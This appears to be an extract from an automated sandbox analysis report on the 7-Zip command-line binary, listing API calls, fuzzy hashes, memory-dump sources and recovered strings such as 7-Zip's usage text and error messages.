                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45B15E2321964090CE20FF22D45266EA724FBD2BD4F84D112FB4E4777ADF69C986DB12
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00971C98
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00971CB9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                  • Opcode ID: 4011904a981b9cc7d5110702b517e72b43359cd785bba75f51c38677a1bb3970
                                                                                                                                                                                                                                                  • Instruction ID: d9ef854ed45ef9acdcc1bf939416f4c30e1383f63cd439242b1b185b910e2afb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4011904a981b9cc7d5110702b517e72b43359cd785bba75f51c38677a1bb3970
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EA1922365864082CB20EF19E49166EB725FBD67D0F94D112FB9E47B69DF2CC886CB10
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                                                                  • Instruction ID: c11c957c1ac407ab9bf7990c50f458b1504726778f48436ec32b103fe2ce8341
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14513127625A8489C711EF32D9513AA6325F7D6FE8F994271DE2D1B759DE20C802C360
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free$fputc
                                                                                                                                                                                                                                                  • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                                                                                                                                                                                                                                  • API String ID: 2662072562-1527772849
                                                                                                                                                                                                                                                  • Opcode ID: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
                                                                                                                                                                                                                                                  • Instruction ID: fbfc4be342d4e647b4151c457dd5e2e7977ba5d059cfad3257f7e23b1baddfe1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3517D7731450086DE30EB26EA953AE7326FBC4BE4F448126EE5E076A5DF2CD945C340
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-0
                                                                                                                                                                                                                                                  • Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                                                                  • Instruction ID: e660b54260404f9031751b905419b5a477bbe9a14a7607f35b58891d442dd779
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B771A723219A8191DE20EF26E89139EA721F7C67D0F549122FF9E57B6DDF28C846C710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009A187D
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrowfreemalloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2861928636-0
                                                                                                                                                                                                                                                  • Opcode ID: fc3a67dbef3549b613e96df0c000b572b71572800cf79d164be4322c4d64f1de
                                                                                                                                                                                                                                                  • Instruction ID: 5c3e68976609fa2b7531c99f6fc1e370c1eff1deb558ff33277e8c5cff150f5b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc3a67dbef3549b613e96df0c000b572b71572800cf79d164be4322c4d64f1de
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0812637219AC481CA60EF26E460BAF6768F7DBB84F519066DB8E53B15CF38C446CB44
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                                                                  • Instruction ID: 7b8e45540b77b6d03592dcf12a1fb539e3902dfe3ab4aec2b6b10fa7787afd4c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C631C52362998085CA11BF77DD513AC6320FBC2F94F998172AF2E5B369CE20C842C364
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID: 2$3$?$?$Z
                                                                                                                                                                                                                                                  • API String ID: 1534225298-3338962022
                                                                                                                                                                                                                                                  • Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                                                                  • Instruction ID: a03b0e470efda5792cc341c19872be2a8dcf6fe0384c62e92a2aea8ad8f2c622
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96C1C633329A8096CB30EB25D4906AFB725F7D6B84F508512EB9E43B69DE38C945CB41
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                                                                  • Instruction ID: 3852c3ccf83ab7f16886da889bdd108ad7903d275ad0b4dff3928a7eb10933e0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76511833712A8089CB25EF36D4A466D6324FBC6F99B598176DF1E1B728CF24C905C320
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$wcscmp
                                                                                                                                                                                                                                                  • String ID: ..\
                                                                                                                                                                                                                                                  • API String ID: 4021281200-2756224523
                                                                                                                                                                                                                                                  • Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                                                                  • Instruction ID: a230fcb747ee44d31d4a5a4cc26693949363821dc08be4de8b2ea5b22a73226c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D617023715A8086CA20EF16E49135EB324FBD6B94F998121EF4E1BB69DF78C802C750
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free$fputc
                                                                                                                                                                                                                                                  • String ID: Modified: $Path: $Size:
                                                                                                                                                                                                                                                  • API String ID: 2662072562-3207571042
                                                                                                                                                                                                                                                  • Opcode ID: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
                                                                                                                                                                                                                                                  • Instruction ID: 607a487e13f942e5ae46b5e82ad3848e4e2847aa96ce312b3a66923c44c802ff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8221F16631491191DE10EB25FE6476E2321FBD5FF8F44D222EE6E476A5DF28C519C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 73dc987ccbc96a76fd053137d80cd1e85e68fdadf62f71c117497fccd2584006
                                                                                                                                                                                                                                                  • Instruction ID: fd749e4af34a5e4d5381158ef451a2b83bce1ad36a979ea55a3cae8a894824f2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73dc987ccbc96a76fd053137d80cd1e85e68fdadf62f71c117497fccd2584006
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DC1856331898092CB20EF25E49026EA770F7C5B90F94C526EB4E67B69DF39CD85CB41
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                                                                  • String ID: Incorrect volume size:
                                                                                                                                                                                                                                                  • API String ID: 3957182552-1799541332
                                                                                                                                                                                                                                                  • Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                                                                  • Instruction ID: 484e4303f3b1ad139db6fc4957144bf1cb570573997217473b018b602f117452
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6517B73214A8496DF64EF26E8903EDB320F7C5B84F848122EB9D477A5DF28C999C750
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: c96e70f305775fe2be644aefe5c3f32861bae157b673a4b6227a1bbf3ac5cc1e
                                                                                                                                                                                                                                                  • Instruction ID: 96835287cf1bfc1fbd756c88230d3021a65ab1a56804c035d46da13ea13588d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c96e70f305775fe2be644aefe5c3f32861bae157b673a4b6227a1bbf3ac5cc1e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4716C2321CA4081DB20EF66E8503ADA765FBC5BD4F548122AF9E87775DF38C896C350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0097A90A
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0097A9AD
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID: /$\
                                                                                                                                                                                                                                                  • API String ID: 1534225298-1600464054
                                                                                                                                                                                                                                                  • Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                                                                  • Instruction ID: 1ddaa96052e5a65c698152bec8c028fac5593f9fdfd7cf67a0bfde2be99fe0e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F551C813218640A0CE28FF22D5512BE6735FBD27D4B84D121FB9E4776ADF28C946DB02
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 009B8640
                                                                                                                                                                                                                                                  • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 009B8630
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$fputs$memmove
                                                                                                                                                                                                                                                  • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                                                                  • API String ID: 2337578458-4238946813
                                                                                                                                                                                                                                                  • Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                                                                  • Instruction ID: efc0a9aaa3103bd00091fc680c8cca9e98bc67e1b118a4b77a8e81e17960ef77
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB115E637156C086DA20DF15EA903AEB326F7C9BE4F548022CB5E17719CF38C896C711
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 0097FFDA, 0098000E
                                                                                                                                                                                                                                                  • The file operation error for listfile, xrefs: 0097FF71
                                                                                                                                                                                                                                                  • Cannot find listfile, xrefs: 0097FF12
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrow
                                                                                                                                                                                                                                                  • String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                                                                                                                                                                                                                                  • API String ID: 4001284683-1604901869
                                                                                                                                                                                                                                                  • Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                                                                  • Instruction ID: d743e9ea351525b0fb0439dacfb2439f612dd6dfe038c2ced2c9cd455837c4a7
